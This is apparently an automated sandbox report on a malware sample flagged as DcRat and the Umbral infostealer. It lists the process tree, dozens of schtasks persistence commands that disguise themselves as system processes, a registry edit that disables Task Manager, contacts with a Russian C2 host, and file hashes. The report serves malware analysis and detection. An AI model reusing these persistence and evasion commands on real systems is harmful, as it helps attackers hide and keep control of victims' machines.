PID 2592 wrote to memory of 2648 N/A C:\Users\Admin\AppData\Local\Temp\чекер dc.exe C:\Windows\SysWOW64\WScript.exe
PID 2492 wrote to memory of 1468 N/A C:\Users\Admin\AppData\Local\Temp\stealer.exe C:\Windows\System32\Wbem\wmic.exe
PID 2492 wrote to memory of 1468 N/A C:\Users\Admin\AppData\Local\Temp\stealer.exe C:\Windows\System32\Wbem\wmic.exe
PID 2492 wrote to memory of 1468 N/A C:\Users\Admin\AppData\Local\Temp\stealer.exe C:\Windows\System32\Wbem\wmic.exe
PID 2648 wrote to memory of 2388 N/A C:\Windows\SysWOW64\WScript.exe C:\Windows\SysWOW64\cmd.exe
PID 2648 wrote to memory of 2388 N/A C:\Windows\SysWOW64\WScript.exe C:\Windows\SysWOW64\cmd.exe
PID 2648 wrote to memory of 2388 N/A C:\Windows\SysWOW64\WScript.exe C:\Windows\SysWOW64\cmd.exe
PID 2648 wrote to memory of 2388 N/A C:\Windows\SysWOW64\WScript.exe C:\Windows\SysWOW64\cmd.exe
PID 2388 wrote to memory of 2692 N/A C:\Windows\SysWOW64\cmd.exe C:\MsWinsessiondllNet\driverBrokercommon.exe
PID 2388 wrote to memory of 2692 N/A C:\Windows\SysWOW64\cmd.exe C:\MsWinsessiondllNet\driverBrokercommon.exe
PID 2388 wrote to memory of 2692 N/A C:\Windows\SysWOW64\cmd.exe C:\MsWinsessiondllNet\driverBrokercommon.exe
PID 2388 wrote to memory of 2692 N/A C:\Windows\SysWOW64\cmd.exe C:\MsWinsessiondllNet\driverBrokercommon.exe
PID 2692 wrote to memory of 2312 N/A C:\MsWinsessiondllNet\driverBrokercommon.exe C:\Windows\System32\cmd.exe
PID 2692 wrote to memory of 2312 N/A C:\MsWinsessiondllNet\driverBrokercommon.exe C:\Windows\System32\cmd.exe
PID 2692 wrote to memory of 2312 N/A C:\MsWinsessiondllNet\driverBrokercommon.exe C:\Windows\System32\cmd.exe
PID 2312 wrote to memory of 1248 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\w32tm.exe
PID 2312 wrote to memory of 1248 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\w32tm.exe
PID 2312 wrote to memory of 1248 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\w32tm.exe
PID 2388 wrote to memory of 2832 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 2388 wrote to memory of 2832 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 2388 wrote to memory of 2832 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 2388 wrote to memory of 2832 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 2312 wrote to memory of 1976 N/A C:\Windows\System32\cmd.exe C:\MSOCache\All Users\{90140000-0019-0409-0000-0000000FF1CE}-C\cmd.exe
PID 2312 wrote to memory of 1976 N/A C:\Windows\System32\cmd.exe C:\MSOCache\All Users\{90140000-0019-0409-0000-0000000FF1CE}-C\cmd.exe
PID 2312 wrote to memory of 1976 N/A C:\Windows\System32\cmd.exe C:\MSOCache\All Users\{90140000-0019-0409-0000-0000000FF1CE}-C\cmd.exe
PID 1976 wrote to memory of 2280 N/A C:\MSOCache\All Users\{90140000-0019-0409-0000-0000000FF1CE}-C\cmd.exe C:\Windows\System32\WScript.exe
PID 1976 wrote to memory of 2280 N/A C:\MSOCache\All Users\{90140000-0019-0409-0000-0000000FF1CE}-C\cmd.exe C:\Windows\System32\WScript.exe
PID 1976 wrote to memory of 2280 N/A C:\MSOCache\All Users\{90140000-0019-0409-0000-0000000FF1CE}-C\cmd.exe C:\Windows\System32\WScript.exe
PID 1976 wrote to memory of 3068 N/A C:\MSOCache\All Users\{90140000-0019-0409-0000-0000000FF1CE}-C\cmd.exe C:\Windows\System32\WScript.exe
PID 1976 wrote to memory of 3068 N/A C:\MSOCache\All Users\{90140000-0019-0409-0000-0000000FF1CE}-C\cmd.exe C:\Windows\System32\WScript.exe
PID 1976 wrote to memory of 3068 N/A C:\MSOCache\All Users\{90140000-0019-0409-0000-0000000FF1CE}-C\cmd.exe C:\Windows\System32\WScript.exe

Uses Task Scheduler COM API

persistence

Processes

C:\Users\Admin\AppData\Local\Temp\898A94F29EDC228CE3BD2054F3D5D6DD.exe

"C:\Users\Admin\AppData\Local\Temp\898A94F29EDC228CE3BD2054F3D5D6DD.exe"

C:\Users\Admin\AppData\Local\Temp\stealer.exe

"C:\Users\Admin\AppData\Local\Temp\stealer.exe"

C:\Users\Admin\AppData\Local\Temp\чекер dc.exe

"C:\Users\Admin\AppData\Local\Temp\чекер dc.exe"

C:\Users\Admin\AppData\Local\Temp\Inject.exe

"C:\Users\Admin\AppData\Local\Temp\Inject.exe"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\MsWinsessiondllNet\zHYxYvywzA0UOqnH8B4aBgoRvO2C5.vbe"

C:\Windows\System32\Wbem\wmic.exe

"wmic.exe" csproduct get uuid

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\MsWinsessiondllNet\q6hjn2OvCg2VETYAoy3FIOj.bat" "

C:\MsWinsessiondllNet\driverBrokercommon.exe

"C:\MsWinsessiondllNet\driverBrokercommon.exe"

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "taskhostt" /sc MINUTE /mo 11 /tr "'C:\Users\Public\taskhost.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "taskhost" /sc ONLOGON /tr "'C:\Users\Public\taskhost.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "taskhostt" /sc MINUTE /mo 6 /tr "'C:\Users\Public\taskhost.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 9 /tr "'C:\Program Files\Uninstall Information\csrss.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "csrss" /sc ONLOGON /tr "'C:\Program Files\Uninstall Information\csrss.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 14 /tr "'C:\Program Files\Uninstall Information\csrss.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "lsassl" /sc MINUTE /mo 8 /tr "'C:\Recovery\77984722-d108-11ee-bdd4-c695cbc44580\lsass.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "lsass" /sc ONLOGON /tr "'C:\Recovery\77984722-d108-11ee-bdd4-c695cbc44580\lsass.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "lsassl" /sc MINUTE /mo 9 /tr "'C:\Recovery\77984722-d108-11ee-bdd4-c695cbc44580\lsass.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 14 /tr "'C:\Recovery\77984722-d108-11ee-bdd4-c695cbc44580\dllhost.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "dllhost" /sc ONLOGON /tr "'C:\Recovery\77984722-d108-11ee-bdd4-c695cbc44580\dllhost.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 13 /tr "'C:\Recovery\77984722-d108-11ee-bdd4-c695cbc44580\dllhost.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 10 /tr "'C:\Program Files (x86)\Microsoft Synchronization Services\conhost.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "conhost" /sc ONLOGON /tr "'C:\Program Files (x86)\Microsoft Synchronization Services\conhost.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 12 /tr "'C:\Program Files (x86)\Microsoft Synchronization Services\conhost.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "explorere" /sc MINUTE /mo 10 /tr "'C:\Windows\AppPatch\es-ES\explorer.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "explorer" /sc ONLOGON /tr "'C:\Windows\AppPatch\es-ES\explorer.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "explorere" /sc MINUTE /mo 8 /tr "'C:\Windows\AppPatch\es-ES\explorer.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "cmdc" /sc MINUTE /mo 14 /tr "'C:\Recovery\77984722-d108-11ee-bdd4-c695cbc44580\cmd.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "cmd" /sc ONLOGON /tr "'C:\Recovery\77984722-d108-11ee-bdd4-c695cbc44580\cmd.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "cmdc" /sc MINUTE /mo 12 /tr "'C:\Recovery\77984722-d108-11ee-bdd4-c695cbc44580\cmd.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "lsml" /sc MINUTE /mo 8 /tr "'C:\MsWinsessiondllNet\lsm.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "lsm" /sc ONLOGON /tr "'C:\MsWinsessiondllNet\lsm.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "lsml" /sc MINUTE /mo 5 /tr "'C:\MsWinsessiondllNet\lsm.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "WmiPrvSEW" /sc MINUTE /mo 11 /tr "'C:\Windows\en-US\WmiPrvSE.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "WmiPrvSE" /sc ONLOGON /tr "'C:\Windows\en-US\WmiPrvSE.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "WmiPrvSEW" /sc MINUTE /mo 11 /tr "'C:\Windows\en-US\WmiPrvSE.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "wininitw" /sc MINUTE /mo 7 /tr "'C:\Recovery\77984722-d108-11ee-bdd4-c695cbc44580\wininit.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "wininit" /sc ONLOGON /tr "'C:\Recovery\77984722-d108-11ee-bdd4-c695cbc44580\wininit.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "wininitw" /sc MINUTE /mo 6 /tr "'C:\Recovery\77984722-d108-11ee-bdd4-c695cbc44580\wininit.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "InjectI" /sc MINUTE /mo 7 /tr "'C:\Program Files\DVD Maker\ja-JP\Inject.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "Inject" /sc ONLOGON /tr "'C:\Program Files\DVD Maker\ja-JP\Inject.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "InjectI" /sc MINUTE /mo 13 /tr "'C:\Program Files\DVD Maker\ja-JP\Inject.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 10 /tr "'C:\Program Files\Common Files\csrss.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "csrss" /sc ONLOGON /tr "'C:\Program Files\Common Files\csrss.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 5 /tr "'C:\Program Files\Common Files\csrss.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "servicess" /sc MINUTE /mo 5 /tr "'C:\MSOCache\All Users\{90140000-0116-0409-1000-0000000FF1CE}-C\services.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "services" /sc ONLOGON /tr "'C:\MSOCache\All Users\{90140000-0116-0409-1000-0000000FF1CE}-C\services.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "servicess" /sc MINUTE /mo 9 /tr "'C:\MSOCache\All Users\{90140000-0116-0409-1000-0000000FF1CE}-C\services.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "explorere" /sc MINUTE /mo 11 /tr "'C:\MsWinsessiondllNet\explorer.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "explorer" /sc ONLOGON /tr "'C:\MsWinsessiondllNet\explorer.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "explorere" /sc MINUTE /mo 12 /tr "'C:\MsWinsessiondllNet\explorer.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 13 /tr "'C:\Users\Public\conhost.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "conhost" /sc ONLOGON /tr "'C:\Users\Public\conhost.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 8 /tr "'C:\Users\Public\conhost.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "dwmd" /sc MINUTE /mo 7 /tr "'C:\MsWinsessiondllNet\dwm.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "dwm" /sc ONLOGON /tr "'C:\MsWinsessiondllNet\dwm.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "dwmd" /sc MINUTE /mo 5 /tr "'C:\MsWinsessiondllNet\dwm.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "cmdc" /sc MINUTE /mo 12 /tr "'C:\MSOCache\All Users\{90140000-0019-0409-0000-0000000FF1CE}-C\cmd.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "cmd" /sc ONLOGON /tr "'C:\MSOCache\All Users\{90140000-0019-0409-0000-0000000FF1CE}-C\cmd.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "cmdc" /sc MINUTE /mo 5 /tr "'C:\MSOCache\All Users\{90140000-0019-0409-0000-0000000FF1CE}-C\cmd.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "driverBrokercommond" /sc MINUTE /mo 6 /tr "'C:\Windows\schemas\driverBrokercommon.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "driverBrokercommon" /sc ONLOGON /tr "'C:\Windows\schemas\driverBrokercommon.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "driverBrokercommond" /sc MINUTE /mo 12 /tr "'C:\Windows\schemas\driverBrokercommon.exe'" /rl HIGHEST /f

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\eSeckPEt0m.bat"

C:\Windows\system32\w32tm.exe

w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f

C:\MSOCache\All Users\{90140000-0019-0409-0000-0000000FF1CE}-C\cmd.exe

"C:\MSOCache\All Users\{90140000-0019-0409-0000-0000000FF1CE}-C\cmd.exe"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\f3ee51fa-6ca5-405c-bf99-9cf2f55fcb50.vbs"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\9a182fe7-568d-414b-951d-25d6244808b7.vbs"

Network

Country Destination Domain Proto
US 8.8.8.8:53 gstatic.com udp
GB 216.58.201.99:443 gstatic.com tcp
US 8.8.8.8:53 a0947008.xsph.ru udp
RU 141.8.192.103:80 a0947008.xsph.ru tcp
RU 141.8.192.103:80 a0947008.xsph.ru tcp
RU 141.8.192.103:80 a0947008.xsph.ru tcp
RU 141.8.192.103:80 a0947008.xsph.ru tcp
RU 141.8.192.103:80 a0947008.xsph.ru tcp
RU 141.8.192.103:80 a0947008.xsph.ru tcp
RU 141.8.192.103:80 a0947008.xsph.ru tcp
RU 141.8.192.103:80 a0947008.xsph.ru tcp
RU 141.8.192.103:80 a0947008.xsph.ru tcp
RU 141.8.192.103:80 a0947008.xsph.ru tcp
RU 141.8.192.103:80 a0947008.xsph.ru tcp
RU 141.8.192.103:80 a0947008.xsph.ru tcp
RU 141.8.192.103:80 a0947008.xsph.ru tcp
RU 141.8.192.103:80 a0947008.xsph.ru tcp
RU 141.8.192.103:80 a0947008.xsph.ru tcp
RU 141.8.192.103:80 a0947008.xsph.ru tcp
RU 141.8.192.103:80 a0947008.xsph.ru tcp
RU 141.8.192.103:80 a0947008.xsph.ru tcp
RU 141.8.192.103:80 a0947008.xsph.ru tcp
RU 141.8.192.103:80 a0947008.xsph.ru tcp
RU 141.8.192.103:80 a0947008.xsph.ru tcp
RU 141.8.192.103:80 a0947008.xsph.ru tcp
RU 141.8.192.103:80 a0947008.xsph.ru tcp
RU 141.8.192.103:80 a0947008.xsph.ru tcp

Files

memory/2236-0-0x0000000000400000-0x000000000084E000-memory.dmp

\Users\Admin\AppData\Local\Temp\stealer.exe

MD5 8cc1e7cf94fec9bc505ce7411aa28861
SHA1 08703de84f3db427c368f16c873664d78bd83264
SHA256 cc60087c94ea0ab843dcae2cdd76ac5e9c90599d2909bbba12881babf46158ba
SHA512 fe60f11452c9e470c0b63385cf0ee8f9fd07598c1294ba25cc8c7c093142efe865aba39680ae5f80611db9423717a7094c939f180e5195e7ae91a9633872a423

\Users\Admin\AppData\Local\Temp\чекер dc.exe

MD5 6216b6bef94c09a40bfa263809b1ae56
SHA1 a928120e65199c6aaae6c991aa0466f3f8b06020
SHA256 eabc7e4491961469ccb9c8cd716dbaf5285ecb8ad3edfc6bfec133a1ec80f05b
SHA512 0e311738b5bdf73f01c552b59646485418ab5b99862af5da2bb934d4262307ac8f57274bbd7f6c99376e6be99d424aad5282a73a063529310425666be224d215

\Users\Admin\AppData\Local\Temp\Inject.exe

MD5 d428ddd1b0ce85a6c96765aeaf246320
SHA1 d100efdaab5b2ad851fe75a28d0aa95deb920926
SHA256 453a331db812ed6e0ce6cca5d3b5be26e66c44b5f6fbdc88f98442670b8daecb
SHA512 3f9dda9d998ef282eb31644296ef0617bbf40352189f4ccd744191f466e932ffde2fd2bdaebe89f0bc06e465d57a8e46e08b3001fe834b3d989fc71125d25899

memory/2516-19-0x000000013FE90000-0x000000013FEBA000-memory.dmp

memory/2492-21-0x0000000000180000-0x00000000001C0000-memory.dmp

C:\MsWinsessiondllNet\zHYxYvywzA0UOqnH8B4aBgoRvO2C5.vbe

MD5 7c9bb5fda146efee5ee4a243d6e404b0
SHA1 c2fb82a9efb3a2469e6a120ac4781a7fe26eb3dd
SHA256 1d4b4c4da6c16a2701cec1c24ff21168d26d4f81c0ac8b3e30ed01b8468d488b
SHA512 797e74b283e74a3282223d8035408d55269e4451a289e3873ea197624985121c87dccdbdef42ff99fd8b4d1fd7e856388444e3fc699a9d6b061499682a043771

C:\MsWinsessiondllNet\q6hjn2OvCg2VETYAoy3FIOj.bat

MD5 ea70d7b0f1a8a1ff2d246efbdcfe1001
SHA1 252e762aee8fcc5761e17bb84aa3af8276852f5c
SHA256 1947411b5329e6db696c2354b56290b82aaf58b5f5d75fd4f3315fbe27999e31
SHA512 1fd28c415177644e069ded3e0ab3d27105fdac2d76f1060abb127e1961f310c81559e4c1213e61a7f32583cee9f4560106cafc88f0f20cf470edb756aadbec86

\MsWinsessiondllNet\driverBrokercommon.exe

MD5 d84e590c3715c79dc5b92c435957d162
SHA1 2901580903e4b356448d9fe7bea510261e655363
SHA256 d81c1097d231fdcb536974ef025f230d1c4091bab3edcf4f9da9344b44b638ba
SHA512 b797cdb43776a7e8a19f9c93299857d8f88651e13c7ba5ddb57f0ac0b24c7b98e6cc6c20ae1561948fb49774edad31cd237f40c9c690d34923ffee56bc02a485

memory/2692-36-0x0000000000D90000-0x0000000000FDA000-memory.dmp

memory/2692-37-0x0000000000140000-0x0000000000148000-memory.dmp

memory/2692-38-0x0000000000150000-0x0000000000158000-memory.dmp

memory/2692-39-0x0000000000160000-0x0000000000170000-memory.dmp

memory/2692-40-0x0000000000AD0000-0x0000000000B26000-memory.dmp

memory/2692-41-0x0000000000170000-0x000000000017C000-memory.dmp

memory/2692-42-0x0000000000180000-0x000000000018C000-memory.dmp

memory/2692-43-0x0000000000390000-0x000000000039C000-memory.dmp

memory/2692-44-0x00000000003A0000-0x00000000003A8000-memory.dmp

memory/2692-45-0x0000000000530000-0x000000000053A000-memory.dmp

memory/2692-46-0x00000000005C0000-0x00000000005CE000-memory.dmp

memory/2692-47-0x00000000006E0000-0x00000000006E8000-memory.dmp

memory/2692-48-0x00000000006F0000-0x00000000006FA000-memory.dmp

memory/2692-49-0x0000000000700000-0x000000000070C000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\eSeckPEt0m.bat

MD5 c4e42cae876a05ae0c753a0a8fd32164
SHA1 d8cc369a8649c85f0c25f0826d447f3c62191238
SHA256 75daf4baae8d884fab1397f8524a6f645895de1a81e03ba5c776d7ec726abb45
SHA512 e569796ef385532522c271e9d7832ff9bc0920ad4b73441024ab10ace401cf41fe182ea16fc2992044c444cb325beaf156a871d0dedd14672dd9c3b95d5ce1f1

memory/1976-93-0x0000000001300000-0x000000000154A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\f3ee51fa-6ca5-405c-bf99-9cf2f55fcb50.vbs

MD5 599938f2aed6b131cd8d747f26edb4d4
SHA1 62906394e606959918b273c8a6f711a85b0505ee
SHA256 ab1325106363bf6a296704640c8c8d4194f240ca53080e7fa3ddae1c3338d562
SHA512 f1d0434c1385cef8546a4dbdf38b64ec29a278c649732c0e7f178e1f8637f1864b216dda373188c10edd522e03241649ce3ccaf8ce39ae66043143ec06f1f8b1

C:\Users\Admin\AppData\Local\Temp\9a182fe7-568d-414b-951d-25d6244808b7.vbs

MD5 cf054cb4dd3a2611b771fe67b621dc7d
SHA1 6f3768c0436933ba418a03b2ade39cd4ffb2f1dd
SHA256 add2fe82610d0f7bdcfe3d6ff4dfe245f991e2f0b21a475c1377f062017a0de8
SHA512 8ea088f7368d414b792f3a459779a73ee51f1dd0de80552acf5b58702ca2ac1a19904f9497ba137f5293ec389c4e19dde5bc51ea75f4179f1260f733323c7ea1

Analysis: behavioral2

Detonation Overview

Submitted

2024-05-03 19:11

Reported

2024-05-03 19:13

Platform

win10v2004-20240426-en

Max time kernel

150s

Max time network

150s

Command Line

"C:\Users\Admin\AppData\Local\Temp\898A94F29EDC228CE3BD2054F3D5D6DD.exe"

Signatures

DcRat

rat infostealer dcrat

Detect Umbral payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Process spawned unexpected child process

Description Indicator Process Target
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe

Umbral

stealer umbral

DCRat payload

rat
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Disables Task Manager via registry modification

evasion

Drops file in Drivers directory

Description Indicator Process Target
File opened for modification C:\Windows\System32\drivers\etc\hosts C:\Users\Admin\AppData\Local\Temp\stealer.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Control Panel\International\Geo\Nation C:\MsWinsessiondllNet\driverBrokercommon.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Control Panel\International\Geo\Nation C:\Program Files (x86)\Windows Photo Viewer\spoolsv.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\898A94F29EDC228CE3BD2054F3D5D6DD.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\чекер dc.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Control Panel\International\Geo\Nation C:\Windows\SysWOW64\WScript.exe N/A

Reads user/profile data of web browsers

spyware stealer

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A discord.com N/A N/A
N/A discord.com N/A N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A ip-api.com N/A N/A

Drops file in Program Files directory

Description Indicator Process Target
File created C:\Program Files (x86)\Microsoft\EdgeUpdate_bk\TextInputHost.exe C:\MsWinsessiondllNet\driverBrokercommon.exe N/A
File created C:\Program Files (x86)\Microsoft\EdgeUpdate_bk\22eafd247d37c3 C:\MsWinsessiondllNet\driverBrokercommon.exe N/A
File created C:\Program Files (x86)\Windows Photo Viewer\spoolsv.exe C:\MsWinsessiondllNet\driverBrokercommon.exe N/A
File created C:\Program Files (x86)\Windows Photo Viewer\f3b6ecef712a24 C:\MsWinsessiondllNet\driverBrokercommon.exe N/A
File created C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\lsass.exe C:\MsWinsessiondllNet\driverBrokercommon.exe N/A
File created C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\6203df4a6bafc7 C:\MsWinsessiondllNet\driverBrokercommon.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\bcastdvr\WmiPrvSE.exe C:\MsWinsessiondllNet\driverBrokercommon.exe N/A
File created C:\Windows\bcastdvr\24dbde2999530e C:\MsWinsessiondllNet\driverBrokercommon.exe N/A
File created C:\Windows\RemotePackages\RemoteApps\RuntimeBroker.exe C:\MsWinsessiondllNet\driverBrokercommon.exe N/A
File created C:\Windows\RemotePackages\RemoteApps\9e8d7a4ca61bd9 C:\MsWinsessiondllNet\driverBrokercommon.exe N/A

Enumerates physical storage devices

Detects videocard installed

Description Indicator Process Target
N/A N/A C:\Windows\System32\Wbem\wmic.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ C:\Users\Admin\AppData\Local\Temp\898A94F29EDC228CE3BD2054F3D5D6DD.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000_Classes\Local Settings C:\Users\Admin\AppData\Local\Temp\чекер dc.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000_Classes\Local Settings C:\MsWinsessiondllNet\driverBrokercommon.exe N/A
